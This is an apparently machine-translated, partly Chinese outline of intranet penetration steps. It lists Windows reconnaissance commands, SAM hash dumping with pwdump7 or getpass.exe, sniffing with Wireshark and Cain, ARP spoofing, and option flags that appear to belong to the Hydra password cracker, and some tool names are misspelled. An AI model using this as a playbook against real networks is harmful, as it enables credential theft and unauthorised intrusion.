1, information gathering premise: to get a network server
2, traffic monitor
3, ARP spoofing
4, password cracking
Information gathering
Internal host collection (host itself)
ip:ipconfig /all
Process: tasklist
Services: services.msc
Port: netstat -an
Software installation: The default installation directory
File sharing cache information
Remote Desktop logon cache: mstac
ftp logon cache
cookie: browser cookie cache
Software download directory
Administrator Information: net user administrator
User Info
sam password information: pwdum7 or getpass.exe
account information
Boot information
Information Protection
Data Deleted
Log information
User login: query user
Network collection:
arp –a
net view
portscan
Traffic monitor
wiresharke
cain
arp spoofing
Password cracking
contribute
-R continue to crack under the previous schedule
-S SSL protocol connection
-s designated port
-l Specifies the user name
-L Specifies the user dictionary
-p Specifies password cracking
-P specify a password dictionary
-e specify a blank password and user password detection probe
-C 用户可以用分割(username:password)可以代替 –l username –p password
-o 输出文件
-t 指定多线程,默认16个
-Vv 显示详细过程
server 目标ip
server 指定服务名 telnet、ftp、pop3、mssql、mysql、ssh